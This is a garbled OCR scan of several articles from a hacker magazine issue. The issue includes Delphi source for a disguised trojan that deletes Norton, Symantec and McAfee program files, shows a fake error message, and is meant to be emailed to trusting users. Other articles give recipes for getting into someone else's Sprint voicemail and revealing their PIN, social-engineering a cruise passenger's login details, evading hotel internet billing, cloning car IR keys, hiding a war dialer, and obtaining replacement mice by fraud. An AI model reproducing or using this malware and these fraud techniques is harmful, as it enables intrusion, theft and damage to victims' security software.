< font size*"€"xstrong>My Stuff at Home
< l --ttinclude file* "cgi -bin/ appname .html* -->
< J --If include file* "cgi -bin/ secure_app.html" -->
< / -- it include file* "cgi -bin/ secondApp.html" -->
< i - -ttinclude file* "cgi -bin/page .html"
\
This may not be the most elegant solution to the problem. In fact, it's a bit of a kludge. But
it doesn't rely on an external DNS provider and was easy to implement.
Related Links
http://free.prohosting.com - reliable free web hosting with CGI support.
http://lwp.linpro.no/lwp/ - for information about the LWP and libwww-perl perl modules.
Thanks to: Joshua Jackson for creating Coyote Linux, Larry Wall for Perl - the most fun
programming language on the planet, Jen, Will, and Maddy for putting up with my computer
, habit.
■Spring 3 0 0 ‘I
-Page 13'
A
Sim
pie
But Eff ectire Spsumer
in Your AVS
by Irving Washington
thedarkshir t @ hotmail.com
First off, sorry if anyone's miffed that 1
wrote this in Object Pascal. I happen to like
Borland's IDEs, and Delphi 7 came free with
a computer mag DVD. I actually like it when
the aim is to produce a Win32 app which can
easily take the look and feel of all the Win
OS's, from the battleship gray of 95 to the
Fisher-Price makeover of XP. So there. I'm
sure you all will take about ten seconds to ap-
preciate the concept and can then write some-
thing similar in your own languages.
The basic concept is this:
On execution, the program looks for vari-
ous .exe files in their standard installation
places on the PC running the program. If they
exist, the program deletes them. For example:
if fileExista ('C:\AVS\AVS.exe') then
deleteFile ( • C: \AVS\AVS .exe • )
endif.
(Repeat for each file you want to
delete)
And that, as they say, is that.
It's easy to get lists of .exe files and their
default install locations without shelling out
for all the packages. I got mine by download-
ing demo versions. I expect there's an easier
way to read the tree for each AVS package,
but I wanted to get something going quickly
to see if the AVS software would pick it up. It
doesn't, as far as I can tell.
Therefore, this could be sent via e-mail
systems which check for virii and the like.
The trusting user, seeing the app pass the on-
line scan, would then download and run it on
their own system. The effect is to leave the
"shell" of the AVS on the machine, while re-
moving all the working parts. Kind of like
stealing a PC from the inside, leaving the
empty case behind.
The deleted files cannot be recovered by
going to our old friend the recycle bin. To the
typical user, they will be irretrievable, and
the AVS will require a reinstallation.
This is obviously Not Good. I don't like
the idea that 1 could pay for an AVS designed
to protect my PC that could be knocked out
by a program which any novice with a bare
modicum of programming skills could write,
plus the fact that if the person who sent the
file was targeting a specific PC/group of PCs,
they would be vulnerable to all virii etc. once
the initial AVS De-exe-r had been run.
I know that this program isn't a virus. It's a
program that does what it's supposed to. But
it seems hopelessly lame to me that AVS pro-
grams aren't able to protect themselves
against such a blatant, obvious attack.
My program, once it has removed the AVS
.exe files, displays a little message box saying
how the program is incompatible with that
version of Windows. The AVS De-exe-r can
obviously be called, and touted as, anything
else. A useful memory optimizer, for exam-
ple. It then shows a window with all the stan-
dard menu bar items (disabled) and an error
message. It has an option for reading the de-
tails of the "fault." All cosmetic doohickeys
that serve to trick the user into believing that
this was simply a program that failed to
work, like so many free downloads.
I guess now maybe it's the turn of the guys
who get paid to make these AVS things to
sort this out.
This took me approximately five minutes
to write. Because I believe in responsible
hacking, the only PC I've used it on is my
own. Naturally (here it comes), what you do
with the information contained in this article
is up to you. You know the laws in your own
countries, etc., etc., etc. You know the score.
ENDPREACHO.
Sorry, but I always find those bits quite
fun.
OK, that's enough. The bones of the prog
are below. If you want to use Delphi, I
believe you can get free versions at
www.borland.com. If you want to try out my
app (on your own PCs only!) then email me.
Page it
SbOO tlagazine
//main listing for AVS-De-exe-r as whatnotted in Object Pascal using Delphi 7
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, Menus;
type
TForml - class (TForm)
Buttonl: TButton/
Labe 1 1 t TLabe 1 ;
LiStBoxl : TListBox;
MainMenul : TMainMenu ;
Filel: TMenuItem;
Registerl: TMenuItem;
Sear chi : TMenuI tern ;
Viewl: TMenuItem;
oolsl : TMenuItem;
Windowl: TMenuItem;
Helpl : TMenuItem;
Memol : TMemo;
But ton2 : TButton;
procedure PormCreate (Sender: TObject) ;
procedure But tonlClick (Sender : TObject);
procedure Button2Click (Sender : TObject) ;
private
{ Private declarations }
public
{ Public declarations }
end;
var
Forml : TForml ;
implementation
($R • .dfm)
procedure TForml . PormCreate ( Sender : TOb j ect ) ;
begin
if fileExists (’C:\Program Filea\Navnt\alertsvc.exe') then
begin
deleteFile (’C:\Program Piles\Navnt\alertsvc.exe 1 );
end;
if fileExists (’C:\Program Piles\Navnt\BackLog.exe') then
begin
deleteFile ( 'C:\Program Files\Navnt\BackLog.exe' ) ;
end;
if fileExists ( *C: \ Program Files \Navnt \BootMarn. exe' ) then
begin
deleteFile ('C:\Program Files\Navnt\BootWam.exe');
end;
if fileExists (‘C:\Program Filea\Navnt\DefAlert.exe*) then
begin
deleteFile ('C:\Prograra Files\Mavnt\DefAlert.exe');
end;
if fileExists ('C:\Prograra Files\Navnt\n32scanw.exe') then
begin
deleteFile (‘C:\Program Files\Navnt\n32scanw.exe');
end;
if fileExists ('C:\Program Files\Navnt\navapsvc.exe') then
begin
deleteFile ('C:\Program Files\Navnt\navapsvc.exe 1 );
end;
if fileExists ('C:\Prograra Files\Navnt\navapw32.exe') then
begin
deleteFile ('C:\Program Files\Navnt\navapw32.exe 1 );
end;
if fileExists ('C:\Program Files\Havnt\alertsvc .exe* > then
begin
deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
end;
if fileExists ('C:\Program Piles\Navnt\alertsvc.exe*) then
begin
deletePile ('C:\Program Files\Navnt\alertsvc.exe');
end;
if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
begin
deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
l end;
if fileExists ( ‘C: \ Program Files\Navnt\alertBvc.exe') then
begin
deleteFile ('C:\Program Filea\Navnt\alertavc.exe' ) j
end;
if fileExiata ('C:\Program Filea\Navnt\navapw32.exe') then
begin
deleteFile {'C:\Program Filea\Navnt\navapw32.exe' ) f
end;
if fileBxista ('C:\Program Filea\Navnt\NavUStub.exe') then
begin
deleteFile ('C:\Program Files\Navnt\NavUStub.exe ') ;
end;
if flleExiBta ('C:\Program Piles\Navnt\navwnt.exe*) then
begin
deleteFile {'C:\Program Filea\Navnt\navwnt.exe');
end;
if flleExiata {‘C:\Progranj Filea\Navnt\NPSCheck . EXE* ) then
begin
deleteFile (* C:\Program FileB\Navnt\NPSCheck.EXE');
end;
if fileExiata ('C:\Program Files\Navnt\npaBvc.exe') then
begin
deleteFile ('C:\Program Filea\Navnt\npaavc.exe 1 );
end;
if fileExists ('C:\Program Files\Navnt\NSPlugin.exe*) then
begin
deleteFile (•C:\Prograra Filea\Navnt\NSPlugin.exe');
end;
if fileExiata ('C:\Prograro Filea\Navnt\NTaakMgr.exe’) then
begin
deleteFile ('C:\Program FileB\Navnt\NTaakMgr.exe');
end;
if fileExists ('C:\Program Filea\Navnt\nvlaunch.exe* ) then
begin
deleteFile ('C:\Program Filea\Navnt\nvlaunch.exe');
end;
if flleExiata ('C:\Program Filea\Havnt\POProxy.exe') then
begin
deleteFile ('C:\Program Filea\Navnt\POProxy .exe • ) ;
end;
if fileExists ('C:\Program Files\Navnt\qconeole.exe') then
begin
deleteFile ('C:\Program Filea\Mavnt\qconaole.exe');
end;
if fileExiata ('C:\Program Filea\Navnt\6cnHndlr.exe') then
begin
deleteFile ('C:\Program Filea\Mavnt\ScnHndlr.exe');
end;
if fileExists (’C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE*)
then
begin
deleteFile ('C:\Program File8\Syroantec\LiveUpdate\NDETECT.EXE' ) ;
end;
if flleExiata ('C:\Program Piles\Syniantec\LiveUpdate\AUPDATE.EXE’) then
begin
deleteFile ( 'Cj \P rogram Filea\Syraantec\LiveUpdate\AUPDATB.EXE 1 );
end;
if fileExiata ('C:\Program Filea\Symantec\LiveUpdate\LUALL.EXE') then
begin
deleteFile ('C:\Program Filea\Symantec\LiveUpdate\LUALL.EXE' ) ;
end;
if fileExiata { *C: \Program Filea\Symantec\LiveUpdate\LuCexnServer . EXE 1 )
then
begin
deleteFile ('C:\Program Filea\Symantec\LiveUpdate\LuCocnServer.EXE’);
end;
if flleExiata (• C : \ Program
Files\Symantec\LiveOpdate\l. Sett ings. Default. LiveUpdate* ) then
begin
deleteFile ('C:\Prograro
Files\Symantec\LiveUpdate\l. Settings. Default . LiveUpdate* ) j
end;
if fileExiata ( ’C: \Progran> Pile8\Sytnantec\LiveDpdate\LSETUP.EXE' J then
begin
deleteFile ('C:\Progratn Files\Syraantec\LlveUpdate\LSETUP.EXE' ) ;
end;
if fileExiata { ‘C:\Program Filea\McAfee\McAf ee Internet
Security\gd32 . exe • > then
begin
deleteFile {'C:\Program Filea\McAfee\McAf ee Internet
Security\gd32 . exe * ) ;
end;
if fileExiata ('C:\Prograro Filea\McAf ee\McAfee Internet
Security\gdlaunch . exe ' ) then
begin
V
deleteFile ('C:\Program Fi lea\McAf ee\McAfee Internet
/
J
9
f SecurityXgdlaunch . exe ' J ;
end;
if fileExists ('C:\Program Filea\McAfee\McAf ee
Security\gdcrypt . exe * ) then
begin
deletePile ( 1 C s \ Program Files\McAfee\McAfee
SecurityXgdcrypt . exe * ) ;
end;
if fileExists ('C:\Program Piles\McAfee\McAf ee
Security\GuardDog . exe ’ ) then
begin
deletePile ('C:\Program Files\McAfee\McAfee
Secur i ty \QuardDog . exe * > ;
end;
if fileExists ('C:\Program Files\McAf ee\McAfee
Security\IView . exe • ) then
begin
deletePile ('C:\Program Piles\McAfee\McAfee
Security\rview.exe* ) ;
end;
if flleBxists (’C:\Program Piles\McAfee\McAf ee
begin
deleteFile ('C:\Prograra Files\McAfee\HcAfee
end;
if flleBxists (*C:\Program Files\McAfee\McA£ee
Component s \ Vi sualTrace\NeoTrace . exe * ) then
begin
deleteFile ('C:\Program Filea\McAfee\McAfee
~omponents\VisualTrace\NeoTrace . exe * ) ;
end;
if fileExists ( 'C: \ Prog ram Files\McAfee\McAf ee
Components\Shredder\ahred32.exe* > then
begin
deletePile (*C:\Program Filea\McAf ee\McAfee
Ccxnponents\Shredder^shred32.exe• )
end;
if fileExists ('C:\Prograra Piles\HcAf ee\McAf ee
ComponentsXQuickClean Lite\QClean.exe') then
begin
deleteFile ('C:\Program Files\McAfee\McAfee
Component s\OuickC lean LiteXQClean . exe * ) ;
end;
if fileExists C : \ Program Files\HcAf ee\McAfee
Updater\RuLaunch . exe * ) then
begin
deleteFile ('C:\Program Pi les\McAf ee\McAfee
Updater\RtiLaunch.exe* ) ;
end;
if fileExists (’C:\Program Pi les\McAfee\ McAfee
Component s\Guardian\ CMGrdian . exe * ) then
begin
deleteFile ( * C : \ Program Files\McAfee\McAfee
Component s\Ouardi an \CMGrdi an . exe ’ ) ;
end;
if flleBxists ('C:\Program Files\McAfee\McAfee
Components\Guardian\schedwiz.exe') then
begin
deletePile ('C:\Prograin Piles\McAfee\McAf ee
Component a \Guardian\aehedvix . exe ' ) ;
end;
if fileExists ('C:\Program Files\McAf ee\McAfee
Components\Central\CLaunch.exe * ) then
begin
deleteFile ('C:\Prograra Piles\McAf ee\McAfee
Components\Central\CLaunch.exe' ) >
end;
showmessage ( 'Could not find dev\null\drivers.dll
atart. ' ) ;
Firewall\cpd.exe*) then
Firewall\cpd.exe 1 ) ;
Shared Component s\ Instant
Shared Component s\ Instant
Application failed to
procedure TForml . But tonlClick (Sender : TObject) ;
begin
Close ;
end;
procedure TForml. But ton2Click( Sender: TObject);
begin
ListBoxl. Visible :* false;
Memo 1 .Visible :• true;
end;
by Estragon
Many hotels are offering high-speed Inter-
net access to people who stay there. Mostly
this is via Ethernet cables, though some ho-
tels also offer wireless. This article addresses
one particular setup that we will probably be
seeing a lot more of, which I got to use and
experiment with at a Hilton hotel (at the
Schiphol airport in Amsterdam, when my
flight was canceled and I was forced to stay
an extra day).
1 think we'll be seeing a lot more of this
type of integrated hotel system because it is
very sophisticated and capable. It's not clear
whether Hilton is using a standard vendor
system or has merged several different types
of systems, but the outcome is full integration
of television (including games and pay per
view), TV-based Internet (similar to
WebTV), the hotel's information system
(TV-based, to check out and see bill status),
telephone, and of course high-speed Internet.
You can guess which one is of interest to
the folks who are reading this: high-speed In-
ternet. I will give a rundown of the system
and some tips on how to get some time on the
system without paying for it. The details of
the fully integrated system, which Hilton
claims it will be rolling out to all hotels in the
future, are probably different than most other
hotels with high-speed Internet. But the
Internet portion is pretty standard, and the
workarounds are similar to what I've
encountered at some other places.
OK, so here's the drill: You set up your
laptop or whatever and plug in the standard
Ethernet cable supplied on the hotel room's
desk. You might need to reboot or otherwise
tweak your system for it to recognize there is
a new connection available.
In other hotels, what happens next is that
you open your web browser and try to visit a
page, and instead are redirected to a web
page by the Internet company (for example,
STSN. which is found in many hotels such as
the Sheraton chain).
But in the Hilton, once I plugged in, the
TV came on and beeped annoyingly (the
same beep they use for a wake-up call. It got
my attention!). It said that I was trying to ac-
cess the Internet and to enter a room number
or PIN using the TV's remote control.
This is actually a good security feature to
make sure you didn’t somehow get to the
patch panel or some other open connection.
You can't enter someone else's room number
(I tried) because your Cisco unit’s address
(below) is linked to your room. So you enter
your room number.
Next, it steps you through the process of
rebooting your computer (obviously, in-
tended for Microsoft users), then says to try
to access the Internet.
This is where the free access begins. At
this point your computer is (hopefully) con-
nected and has received its IP address via
DHCP. However, you did not yet confirm
with the TV that you're accessing the Internet
and have not loaded any web pages.
The trick is that standard ports other than
80 are now open. I was able to ssh (port 22)
to another computer on the Internet with the -
X option (to tunnel X Window connections).
I could then start Mozilla or whatever app re-
motely and have it show up on my computer
in the hotel room. (Of course, you need to lo-
gin via an xterm or similar and have an X
server on your computer.)
Unfortunately this bliss only lasted for ten
minutes or so (you might get a little extra
time by using the "Back" on the remote con-
trol and otherwise trying to reset any timers
that are running). Eventually the TV beeps
again and you're back at step one but your ssh
session gets blocked.
The good news is you can start over again
and get another ten minutes of connectivity.
But I was unable to continue my ssh session
(even though the DHCP IP address was the
same) and needed to reconnect.
Why bother trying to get ten minutes?
Well, in this hotel (and probably all those
with the same setup) charges for access are
by the hour, not the day. I was paying ten eu-
ros per hour (about $12) once I gave up
screwing around and tried to get some work
done in segments longer than ten minutes, so
I appreciated the extra "free" time. I checked
P • g • is
St.00 Hsgaxlna
'the next day and also kept track of my time
(the TV beeps after an hour to let you know
your time is almost up), and confirmed that
the extra 30 minutes or so I got in ten minute
increments were not charged.
Later, 1 saw that for about $40 a day you
could get a package with unlimited Internet
plus unlimited pay per view movies and other
perks. Well, maybe that's worth it if you’ve
got the need and the bucks.
Here's a little more information about the
configuration. They are using Cisco 575 LRE
Customer Premise Equipment (CPE) units in
each hotel room (see http://www.cisco.com
>»/warp/public/ce/pd/si/575/prodlit/index.shtml
for specs). These were attached to the back of
a digital TV and have two network connec-
tions, two power connections, and what looks
like an active security monitoring device (so
be careful if you try to move it around much).
The Cisco 575 LRE product sheet says it
needs to connect to a Catalyst 2900 LRE XL
switch, which is probably where the smarts
are. The integration with the TV and billing
system was not clear, but my guess is that the
TV got its commands via the 575. These
commands were probably from a separate
computer in the building that also was doingN
the monitoring and billing for pay per view,
security, etc.
I did all of the above with my portable
Mac running OS X. Unfortunately, 1 didn't
have nscan or other tools to try to probe the
network further or sniff the network, and I
didn't have enough time to grab them and ex-
periment. Obviously if you could see their
server for billing, etc. there would be oppor-
tunities to either try to fool the server or get
access to it. If Hilton is smart, there would be
very limited access from the server to the rest
of the hotel infrastructure (otherwise, for ex-
ample, access to non-critical services like in-
room Internet and pay-per-view could yield
access to critical services like door key-card
encoding).
In closing, the system I used was defi-
nitely very cool, but had an easy and obvious
way of bypassing the charging system for
some free Internet. Even though it costs a lot
of money to stay in a Hilton and pay (by the
hour!) for Internet service, my guess is that
these types of integrated systems (TV, Inter-
net, games...) will be a lot more common in
the future.
by JestersS
Jesters8@yahoo.com
Recently I went on vacation and I took a
cruise through Alaska. I was sailing on the
Carnival "Spirit." It was a good time, but as I
got a little restless I wondered just what things
of interest could be found onboard.
Background
Let me give a little background on how the
technological aspects of the ship work. When
you come onboard for the first time, every per-
son receives a "Sail and Sign Card." At first it
seemed like nothing more then a glorified
room key. but as the features of the card were
explained, it seemed to be more and more use-
ful. Not only did the magnetic strip card act as
,i room key. but it also was a credit card and
photo ID to get back onboard the ship after we
i locked in a port. After I was issued a card, I
. stood in front of a booth and my picture was
taken. 1 could see as I walked around behind
the booth that it was a touch-screen computer
that stored everyone’s pictures. Later I learned
that once someone boarded the ship again, the
security officer only had to look at the stored
photo (which would appear when the card was
swiped) to make sure it was truly that person.
The cruise was what they referred to as a
"cashless cruise." To buy something in the gift
shop or bar, you gave them your card and
signed a receipt, much like a credit card. Then,
your room was billed and when you got home
you wrote a check.
The card designers had some sense when
making their system. The card has a four digit
ID number (called a "folio" number) but no
room number, so if someone accidentally
found your card, they couldn't break into your
room unless they had some other way of
knowing where you were staying. Another
interesting system used by the cruise was a
way of ordering tickets to do different things
onshore. With your TV, you used your remote
to pick out something and then entered your
folio number. The next morning tickets were
delivered to your door. Along with ordering
things, you could also see everything you had
paid for by typing in your folio number. This
seemed to have numerous voyeuristic possi-
bilities, so to test it out I asked a friend of mine
from a different room to enter his number on
my TV. It seems they matched your folio num-
ber to your room number inside the purchase
checking system, so your folio number could
only be accessed through your own room. To
further check this I rode on the elevator a few
limes, memorizing the folio numbers on cards
people had out. I returned to my room and
found that all of the numbers that I knew were
valid ID numbers could not be accessed from
my TV.
The Internet Cafe
All of this leads me to the most interesting
part of the ship for an inquisitive mind - the
Internet Cafe. This was a library-like room on
the ship with a dozen computers, although the
only thing accessible was the monitor, key-
board, and mouse. The actual computer was
inside a locked wooden cabinet. To get to use
one of these machines you had to log in and
suffer charges that equated to highway rob-
bery. To log in. you typed in your first initial,
last name, and room number as your user-
name, and your folio number as your pass-
word (which could later be changed to
anything). For example, if my name were John
Smith, my login would be jsmithl234. Not
wanting to pay these exorbitant charges, but
not wanting to really steal access, I resolved
myself to poking around the system. To sec if
the login manager could be exited 1 tried every
hotkey combination I could think of, all the
Ctrl-, alt-, shift-, Ctrl- alt-, Ctrl- alt- shift -, etc.
This proved fruitless. By right clicking. I
learned that the login system was made in
Flash and playing in Flash Player 6.0. Next, if
I clicked on the option in the right click menu
that said "About Macromedia Flash Player
6.0" for a brief moment the Taskbar appeared.
If you were quick you could access a limited
Start menu. It only allowed access to "Pro-
grams", but I was able to look at the "Start Up"
menu. It had two executables that appeared to
be written in VB, because it had that VB exe-
cutable icon instead of the standard Windows
one. The two programs were named
"dsibillingxp.exe" and "sysckxp.exe".
Googling these names revealed that some- >
thing called "sysck.exe" is a Motorola cable
modem driver. However, this may not be re- |
lated to the program on the ship's computers,
because the ISP for the ship was Digital Seas,
a satellite broadband ISP designed just for
cruising ships. I managed to crash the com-
puter by trying to run dsibillingxp.exe. F8 was
disabled as the computer rebooted, so I could-
n't access safe mode or anything. I did learn
that the machines were made by Compaq and
running XP Pro. It didn't use the normal XP lo-
gon with the list of users and little pictures, but
the Windows network login. Since it displayed
the last login name, I found out the user name
for the passengers' systems was "cruise". I
tried common passwords and things that might
seem logical, but I couldn't crack the pass-1
word. It wouldn't be of much value even if I
did because it would start the two programs!
and bring me right back to where I started. The
default logins for administrator privileges and
guest had been disabled.
I still wanted to see if it was possible to get
access without paying, so it was time for a lit-
tle social engineering. Since you needed a
room number, a name, and a folio number, a
room card would not be enough to get on a
computer. There was one thing that had all this
information, however. It was a receipt. When
you bought something at the bar and signed
for it, you kept the customer copy and this had
your full name, room number, and folio num-
ber printed on it. There weren't exactly dump-
sters onboard to go through, but I had an idea.
I got a piece of paper with something printed
on it and folded it over. I headed for the bar
and approached a fifty-something woman (not
trying to be sexist, but she seemed convinci-
ble). I told her I was playing in a family scav-
enger hunt and that one of the items was a
drink receipt. I asked if I could have hers. She
handed it over without hesitation.
Now being the good person I am, I wasn't
going to do anything with her personal infor-
mation. But the point is I could have. Anyone
could have used it to quickly rack up hefty
charges to her bill. In conclusion, their com-
puter systems seemed secure to basic intrusion ;
attempts, but the weakness in the system lies
in the customers.
Greetz: MerlinI22 for always being there l
when / need him.
Page BO
■B b 0 0 Hagazine
r
A Sprint PCS
Trick
SY
IN
1121
255512120**0
02025551212 #
rsRvii r©uiTi
Sprint >
by quel
We ail love to hate cell phone companies.
But some in particular, like Sprint PCS, seem to
go out of their way to try to screw you over.
First, have you noticed that it costs you minutes
to call your voicemail?
For those of you with free Sprint to Sprint
minutes this makes even less sense. You might
find this trick useful: 1 1 -XXX-XXX-XXXX T
- ** TT XXX-XXX-XXXX #. The first num-
ber is any other Sprint cell phone number. Don't
worry, their phone won't ring. The second num-
ber is your phone. If you call your voicemail in
this fashion then it will be billed as Sprint to
Sprint minutes and you will be able to check
your voicemail for free like you should have
been able to all along. This was presented on Off
The Hook not too long ago without an explana-
tion. If you notice the dialing of two ones, it is
obviously an erroneous number. But instead of a
regular misdialed number message, you get
Sprint's attempt to trap the number. As this mes-
sage starts a ** will drop you into the Sprint
voicemail system and then you are just left to
dial your number. (The T's are two second
pauses and how Sprint phones let you store
them.) I am quite surprised Sprint hasn't tried to
shut this down yet. Maybe this article will
prompt action on their part.
The fun with Sprint's voicemail doesn't stop
there. I'm sure many of you don't have your
voicemail prompt you for your PIN out of con-
venience. Hopefully you will shortly be con-
vinced to change the settings to always prompt.
If you have the actual person's phone then
this is a trivial "hack" but without physical ac-
cess to their phone we spend lime with our dear
friend the phone op. Simply AN! fail by op di-
verting and then supply them the number to the
phone you want to call and then supply your
destination number. Yes, this will appear as if
you are calling from the AN1 to the same AN1. If
the op gives you trouble you can always say
something about your phone keypad having a
number that's bad so you can't use your cell to
call your voicemail.
Now you are in the target's voicemail, re-
motely or locally, unless they require the PIN to
be entered. But, wait the fun doesn't stop, do you
want to know their PIN number? (Perhaps it’s
their ATM pin or some other valuable number
that they use everywhere?) Dial 3 for personal
options, then 2 for administrative options, then 1
to turn skip pass code on. It will then immedi-
ately tell you the current code.
At this point you have total access to their
voicemail as well as their PIN number and the
target is utterly helpless.
I'm sure this trick will work to get you into
voicemails on many other cell phone companies
and other systems. I hope more of you will learn
to not have your PINs, passwords, etc. saved for
you due to the grave security threat this poses.
Shouts to amatus, lucky225, arron,
Ncongnmt, Cavorite. and clarkk.
MnitoiDiis Hhxz
WITH A
IJ
MVliHSAI
gt ••••■
n
lit
illOTI;
‘jL
Mi, -
by TOneZ2600
This article is intended as an educational ref-
erence. In no way should it be used to gain un-
lawful access. This includes breaking and
entering as well as grand theft.
As we all see and know, Mercedes Benz
makes the most common luxury vehicles. Prices
for these cars go from (new) $24K to approxi-
mately $250K. After 1991 Mercedes Benz
changed locking systems throughout their cars.
^Iprlns S00V
From a steel key that had to be "laser" cut to a
steel key with an infrared sensor attached to it
and recently to just an IR remote. (No more steel
key.) The infrared sensor controller is attached
to the key and aids in the keyless entry system.
Older Mercedes Benz vehicles (91-99) have ac-
tual IR sensors for door locks and trunk release
mechanisms. Currently Saab, Volkswagen and
other (semi) luxury vehicles have incorporated
this new IR system for their vehicles.
Page B 1
When buying new IR keys for your vehicle,
the key has to be "trained" to your car. This
process takes anywhere from five minutes to
five hours depending on the IR coding
complexity. Once the key is trained, that's it
So what does that do for me? Well, let's just
say you left something in your car and you lost
your key. How do you make an archive key
from a Universal Remote? Simple.
First, you are going to have to obtain a
remote that has a "learning" function. There
are several remotes on the market with this fea-
ture. If you have a PDA that is IR equipped. I
think the program "TV Remote Controller 5.5"
will be suitable.
Now grab your original IR key. The only
thing that is left to do is to train the Unlock.
Lock, and Trunk Release on your remote. This
is done by selecting the button that you want to
train and emitting an IR source from the origi-
nal key. It's that easy and that stupid to own an
$80K car.
The
Hardware
WarID I ALER
by Grandmaster Plague
Have you ever been on a pen-test, doing
some reconnaissance or just poking around for
fun, and thought about how great it would be
to have a hardware war dialer that you weren't
worried about using and losing? Well, here’s
the answer to your problems, and it's not as
difficult as you might expect.
Overview
A war dialer is "a program that calls a given
list or range of phone numbers and records
those which answer with handshake tones (and
so might be entry points to computer or
telecommunications systems). Some of these
programs have become quite sophisticated,
and can now detect modem, fax, or PBX tones
and log each one separately." War dialers are
especially useful for exploring PBX networks
and probing a particular target for a point of
entry that may have been forgotten. Tradition-
ally, a war dialer is used from a computer. This
could be from a PC at one's home, school, etc.
or a laptop out in the field. Advantages to a PC
are the virtually unlimited power supply, and
the fact that you know it's not going anywhere.
Disadvantages to the PC are that one usually
doesn't want the phone company to know
you're dialing a thousand sequential numbers
in a matter of an hour or so. Especially since
they can trace you to where it’s happening. If
that happens to be your home or place of em-
ployment, you may not want the police keep-
ing an extra watchful eye on what goes on
there. So the other alternative is a laptop.
Great, you can leave it be wherever you want
and let it dial and collect all the data it wants
while remaining relatively worry-free about
the whole police/telco situation. This also
works great if you're testing a PBX and need it
closer to the target (i.e., within the physical
confines of the network). But doesn't this seem
like overkill? Even a cheap laptop has a fancy
color 12” LCD screen, a hard drive, a nice
processor, and pretty good bit of RAM in it,
not to mention network and video cards. And
what if something happens while you're letting
the wardialing software do its job? I don't
know about you, but I don't want to leave my
expensive laptop lying around for someone
else to stumble upon and pick up while I'm
waiting for results. Also, laptops are bulky.
They're not exactly easy to conceal in those
green TNI boxes while making their calls.
The Solution
The solution I propose has seemed obvious
to many for years, but hasn't become economi-
cally practical until fairly recently. My solution
includes three parts. A computer, a modem,
and software. That simple. However, we're not
just going to use any computer, modem, or
software. We’re going to use a PDA. Specifi-
cally, we're using a Palm V PDA. I picked one
up on eBay with a hard case, cradle, and AC
adapter for $22 (plus $10 S&H). The next
thing we'll need is a Palm V modem. This I got
after a little price-watch browsing from a com - 1
Page SS
ShOO Magazine — '
pany called Compu-America for $4 (plus $4
S&H). Finally, we download TB A, the friendly
PalmOS war dialer from the equally fri^fidly
Kingpin of AtStake (formerly the LOpht). So,
we've got all three things now and it shouldn't
take a genius to pul them together. Hook up the
palm to your computer and load in TBA.
Charge the batteries, take it out of the cradle,
plug in the Palm Modem, start up TBA, and
you should be good to go as soon as you get a
live dial tone.
Ideas
Now that you've got your $40 Hardware
War Dialer ($22 for Palm plus $4 for modem,
plus $14 S&H) up and running, what are you
going to do with it? Well, just reading^e TBA
manual might give you some ideas. You've
got a pretty small device (about .5" thick, 5"
long, and 3.5" wide) that can be concealed
anywhere. You could hide it in one of those
green TNI boxes I was talking about and with
one end of the phone line stripped and alliga-
tor-clipped you have a perfect beige box war
dialer. If you’re worried about power you can
pick up an AC adapter for the modem for a few
more bucks and plug it into the wall some-
where. The possibilities are endless, and hey, if
you lose it or have it confiscated, no huge deal,
right? You only spent forty bucks on it.
Alternatives
Sure, this isn't at all an original idea and it's
been done before. I’m just trying to shed light
on the fact that this can now be done easily and
cheaply. I guess if you wanted to be hardcore
you could hook up an external modem to a mi-
cro-controller and program the micro-con-
troller yourself. However, there is still the
issue of power (you'd either have to find a
place for a battery or always plug it into the
wall). Also, the cost of this would probably be
prohibitive, unless you have a bunch of blank
micro-controllers lying around and a develop-
ment kit for them. You also don't have the ben-
efit of having a neat little Palm V to mess
around with after you're done. And, an external
modem with a micro-controller looks pretty
nefarious when it's sitting on a desk plugged
into a phone line for hours, at least far more so
than a Palm V.
Credits and URLs
Definition from the Jargon Dictionary -
http://info.as trian.net/jargon/terms/wAvar_
—dialer.html
’ Product page for the Palm V modem located
at http://www.compu-america.com/prodLG
-.jsp?prodld=fi083b8fb22. 1
TBA can be obtained from http://www.
—aLstake.com/research/tools/info -gathering/
41 The TBA Handbook is located at
http://www.atstake.com/research/tools/
—info_gathering/tba_handbook.pdf
Hello once again Mary (Nary).
Serial Number Security
byTEV
How many products in shops have their se-
rial numbers on display at all times? These
numbers are printed onto boxes, packets, and
products for the manufacturer to identify the
product in question. Yet, as I'll show below
these numbers should be treated as securely as
PIN numbers and passwords.
Do not do what is in this article. It is fraud
and theft. As simple as that. This article con-
tains nothing of a technical nature; I'm writing
it to highlight a point and to get this noticed.
Although I have outlined a simple scenario,
don't do this. Once this gets read I'm sure com-
panies will be able to spot it a mile away.
S ' s Spring 3 0 0 V
The example I will draw upon is optical
mice. Let's look first at the Microsoft Intel-
limouse. This mouse costs around 25 pounds
and upwards depending on the model. Go into
your nearest PC World or other High Street re-
tailer and go find these mice. I will place a
large bet that throughout the world these will
be on shelves for the customers to look at be-
fore purchasing. Some shops in the UK even
have display models. The packaging for most
of these is well designed to show the product
off in all its glory, which includes a clear shot
of the base of the mouse. There are some im-
portant numbers, the P/N, and the PID (Prod-
uct ID), and the model number. Write these
details down and then go home without buying
Page 33
_
the mouse. When you get home browse
through to the Microsoft site for their technical
help. Ring the technical helpdesk and report
that your mouse has stopped working. Say
something like "the glowing red light doesn't
work." Anything so that the customer services
agent thinks you're the average shopper and a
little clueless. They'll ask you for the PID, P/N,
and the model number. Once you've given
them these numbers you'll be told one of two
things depending on whether you have con-
tacted Microsoft with a similar problem or not.
You will either be asked for your address and
told that a new mouse is now on its way (and
the old one can be thrown away at your discre-
tion) or that you need to cut the USB plug from
the old mouse and post it to them before they
send the mouse out. From what I've seen so far,
ringing a week later and complaining that the
cable must have gotten lost in the post because
you definitely sent it works - they’re just trying
to test you a little.
Three things to note: Firstly don't panic
about giving out your address. As you'll read
later there are usually no follow up calls.
Secondly, on one discussion with a cus-
tomer service rep I was told that each customer
is given three "goodwill gestures." If you ring
a fourth time saying the cable was lost in the
post etc. you get nothing. Microsoft allows
three replacements and any more will arouse
investigation. But then again, why the hell
would anyone need four mice?
And last but not least when the new mouse
turns up feel free to register it and when it
breaks ask for your legitimate replacement!
Now, why should I outline that very simple
(simple as in if you can't do that give up now!)
guide to social engineering? Imagine you're
the person who went into the shop ten minutes
after the evil fraudster and bought that mouse
legitimately. Six months later it breaks and you
want it replaced. Tough. We rang up MS and
tested this out by trying to claim a mouse from
a serial number that a replacement had already
been issued for. We were told that the product
was registered and we should check our num-
